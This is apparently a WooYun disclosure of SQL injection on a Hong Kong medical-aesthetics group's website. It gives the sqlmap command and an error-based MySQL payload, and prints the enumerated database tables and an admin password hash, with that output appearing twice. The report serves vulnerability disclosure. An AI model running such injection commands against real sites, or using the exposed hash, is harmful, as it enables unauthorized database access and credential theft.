当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157262

漏洞标题:麦秀(香港)医美健康管理集团主站存在SQL注入(管理密码)(香港地區)

相关厂商:麦秀(香港)医美健康管理集团

漏洞作者: 路人甲

提交时间:2015-12-01 12:40

修复时间:2016-01-17 11:30

公开时间:2016-01-17 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

麦秀(香港)医美健康管理集团
麦秀是以中国健康促进基金会健康与美丽专项基金为依托,由国家卫生部主管,民政部备案的医美健康管理集团,拥有中国医学领域最先进核心的医学技术和最专业的个人服务,包括一对一专业医师,个人私密档案和专属协议。
我们专注私地的保养和美疗,提供包括私地美塑、私地紧致、G点注射等在内的多项个性化服务,并以此为核心打造了包括医学抗衰老、恶性疾病预防与检测、健康管理与干预、微整形等由内而外的健康管理体系,在香港,台湾,广州,北京,上海等地已拥有独立的五星级医院。

详细说明:

地址:http://**.**.**.**/new_detail.php?tj=8&ty=19&id=114

python sqlmap.py -u "http://**.**.**.**/new_detail.php?tj=8&ty=19&id=114"-p ty --technique=E --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: sq_88544130
Table: userinfo
[1 entry]
+----------------------------------+
| Password                         |
+----------------------------------+
| 8091541b0bbae0b469230a95af0b4679 |
+----------------------------------+

漏洞证明:

current user:    'sq_88544130@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'sq_88544130'@'localhost'
Database: sq_88544130
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| manage_log                            | 2929    |
| shipping_price                        | 720     |
| country                               | 240     |
| article                               | 21      |
| product_category                      | 16      |
| product_category_description          | 16      |
| links                                 | 15      |
| info                                  | 8       |
| info_contents                         | 8       |
| product_brand_description             | 8       |
| product                               | 7       |
| product_description                   | 7       |
| product_ext                           | 7       |
| instance                              | 5       |
| instance_description                  | 5       |
| product_brand                         | 5       |
| survey_item                           | 5       |
| `translate`                           | 4       |
| download_category                     | 4       |
| download_category_description         | 4       |
| instance_category                     | 4       |
| instance_category_description         | 4       |
| payment_method                        | 4       |
| product_color                         | 4       |
| download                              | 3       |
| download_description                  | 3       |
| feedback                              | 3       |
| info_category                         | 3       |
| info_category_description             | 3       |
| shipping                              | 3       |
| video                                 | 3       |
| video_description                     | 3       |
| ad                                    | 2       |
| video_category                        | 2       |
| video_category_description            | 2       |
| product_inquire                       | 1       |
| product_size                          | 1       |
| survey                                | 1       |
| userinfo                              | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1076    |
| SESSION_VARIABLES                     | 328     |
| GLOBAL_VARIABLES                      | 317     |
| GLOBAL_STATUS                         | 310     |
| SESSION_STATUS                        | 310     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| PARTITIONS                            | 89      |
| TABLES                                | 89      |
| KEY_COLUMN_USAGE                      | 52      |
| STATISTICS                            | 52      |
| TABLE_CONSTRAINTS                     | 52      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 20      |
| SCHEMA_PRIVILEGES                     | 18      |
| ENGINES                               | 9       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: sq_88544130
Table: member
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| Password | varchar(32) |
+----------+-------------+
Database: sq_88544130
Table: userinfo
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| Password | varchar(32) |
+----------+-------------+
Database: sq_88544130
Table: userinfo
[1 entry]
+----------------------------------+
| Password                         |
+----------------------------------+
| 8091541b0bbae0b469230a95af0b4679 |
+----------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ty (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tj=8&ty=19 AND (SELECT 3336 FROM(SELECT COUNT(*),CONCAT(0x71786b7871,(SELECT (ELT(3336=3336,1))),0x7171786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=114
---
web server operating system: Windows
web application technology: ASP.NET, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user:    'sq_88544130@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'sq_88544130'@'localhost'
Database: sq_88544130
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| manage_log                            | 2929    |
| shipping_price                        | 720     |
| country                               | 240     |
| article                               | 21      |
| product_category                      | 16      |
| product_category_description          | 16      |
| links                                 | 15      |
| info                                  | 8       |
| info_contents                         | 8       |
| product_brand_description             | 8       |
| product                               | 7       |
| product_description                   | 7       |
| product_ext                           | 7       |
| instance                              | 5       |
| instance_description                  | 5       |
| product_brand                         | 5       |
| survey_item                           | 5       |
| `translate`                           | 4       |
| download_category                     | 4       |
| download_category_description         | 4       |
| instance_category                     | 4       |
| instance_category_description         | 4       |
| payment_method                        | 4       |
| product_color                         | 4       |
| download                              | 3       |
| download_description                  | 3       |
| feedback                              | 3       |
| info_category                         | 3       |
| info_category_description             | 3       |
| shipping                              | 3       |
| video                                 | 3       |
| video_description                     | 3       |
| ad                                    | 2       |
| video_category                        | 2       |
| video_category_description            | 2       |
| product_inquire                       | 1       |
| product_size                          | 1       |
| survey                                | 1       |
| userinfo                              | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1076    |
| SESSION_VARIABLES                     | 328     |
| GLOBAL_VARIABLES                      | 317     |
| GLOBAL_STATUS                         | 310     |
| SESSION_STATUS                        | 310     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| PARTITIONS                            | 89      |
| TABLES                                | 89      |
| KEY_COLUMN_USAGE                      | 52      |
| STATISTICS                            | 52      |
| TABLE_CONSTRAINTS                     | 52      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 20      |
| SCHEMA_PRIVILEGES                     | 18      |
| ENGINES                               | 9       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: sq_88544130
Table: member
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| Password | varchar(32) |
+----------+-------------+
Database: sq_88544130
Table: userinfo
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| Password | varchar(32) |
+----------+-------------+
Database: sq_88544130
Table: userinfo
[1 entry]
+----------------------------------+
| Password                         |
+----------------------------------+
| 8091541b0bbae0b469230a95af0b4679 |
+----------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-03 11:29

厂商回复:

雖然涉事機構提供香港分部聯絡/網站設於香港,經覆查後認為伺服器主要由內地人員管理,請聯絡 CNCERT 跟進。

最新状态:

暂无